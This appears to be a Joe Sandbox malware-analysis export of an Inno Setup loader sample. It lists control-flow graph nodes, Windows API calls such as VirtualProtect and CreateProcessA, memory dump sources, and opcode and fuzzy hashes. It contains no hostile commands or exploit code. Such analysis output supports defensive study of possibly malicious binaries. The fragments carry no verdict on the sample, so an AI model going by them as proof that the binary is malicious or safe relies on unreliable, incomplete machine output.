405b92 6854 405b94 6852->6854 6853 405bd0 6857 405930 5 API calls 6853->6857 6854->6853 6855 405be7 6854->6855 6856 405bca 6854->6856 6861 404ccc 5 API calls 6855->6861 6856->6853 6858 405c3c 6856->6858 6859 405be3 6857->6859 6860 4059a0 19 API calls 6858->6860 6862 403198 4 API calls 6859->6862 6860->6859 6863 405c10 6861->6863 6864 405c76 6862->6864 6865 4059a0 19 API calls 6863->6865 6865->6859 6604 403e95 6605 403e4c 6604->6605 6606 403e62 6605->6606 6607 403e7b 6605->6607 6610 403e67 6605->6610 6608 403cc8 4 API calls 6606->6608 6609 402674 4 API calls 6607->6609 6608->6610 6611 403e78 6609->6611 6610->6611 6612 402674 4 API calls 6610->6612 6612->6611 6613 403a97 6614 403aac 6613->6614 6615 403bbc GetStdHandle 6614->6615 6616 403b0e CreateFileA 6614->6616 6626 403ab2 6614->6626 6617 403c17 GetLastError 6615->6617 6621 403bba 6615->6621 6616->6617 6618 403b2c 6616->6618 6617->6626 6620 403b3b GetFileSize 6618->6620 6618->6621 6620->6617 6622 403b4e SetFilePointer 6620->6622 6623 403be7 GetFileType 6621->6623 6621->6626 6622->6617 6627 403b6a ReadFile 6622->6627 6625 403c02 CloseHandle 6623->6625 6623->6626 6625->6626 6627->6617 6628 403b8c 6627->6628 6628->6621 6629 403b9f SetFilePointer 6628->6629 6629->6617 6630 403bb0 SetEndOfFile 6629->6630 6630->6617 6630->6621 6884 4011aa 6885 4011ac GetStdHandle 6884->6885 6223 4076ac SetEndOfFile 6224 4076c3 6223->6224 6225 4076bc 6223->6225 6226 40748c 21 API calls 6225->6226 6226->6224 6634 4028ac 6635 402594 4 API calls 6634->6635 6636 4028b6 6635->6636 6637 401ab9 6638 401a96 6637->6638 6639 401aa9 RtlDeleteCriticalSection 6638->6639 6640 401a9f RtlLeaveCriticalSection 6638->6640 6640->6639

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                              APIs
                                                                              • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                              • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                              • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 2441996862-0
                                                                              • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                              • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                              • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                              • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                              • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                              • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                              • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02147C4C), ref: 0040966C
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(00010432,000000FC,00409918), ref: 0040A148
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • 73A25CF0.USER32(00010432,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 3341979996-3001827809
                                                                              • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                              • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                              • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                              • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                              • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                              • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                              • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(00010432,000000FC,00409918), ref: 0040A148
                                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000,00409A77), ref: 00409A14
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90), ref: 00409A5C
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • 73A25CF0.USER32(00010432,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 978128352-3001827809
                                                                              • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                              • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                              • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                              • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000,00409A77), ref: 00409A14
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90,00000000), ref: 00409A28
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                              • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02147C4C,00409A90), ref: 00409A5C
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02147C4C), ref: 0040966C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                              • String ID: D
                                                                              • API String ID: 3356880605-2746444292
                                                                              • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                              • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                              • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                              • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                              • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                              • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                              • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                              • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                              • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                              • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: .tmp
                                                                              • API String ID: 1375471231-2986845003
                                                                              • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                              • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                              • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                              • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 332 40778a-40778f 330->332 333 4077fd-407802 330->333 334 40783b-40783d 331->334 335 4077fb 331->335 338 407803-407819 332->338 340 407791-407792 332->340 333->338 339 407841-407843 334->339 335->333 341 40785b-40785c 338->341 349 40781b 338->349 339->341 344 407724-407741 340->344 345 407794-4077b4 340->345 342 4078d6-4078eb call 407890 InterlockedExchange 341->342 343 40785e-40788c 341->343 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 360 407890-407893 343->360 348 4077b5 344->348 350 407743 344->350 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->334 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->334 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                              • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                              • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                              • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLibraryLoadMode
                                                                              • String ID:
                                                                              • API String ID: 2987862817-0
                                                                              • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                              • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastRead
                                                                              • String ID:
                                                                              • API String ID: 1948546556-0
                                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
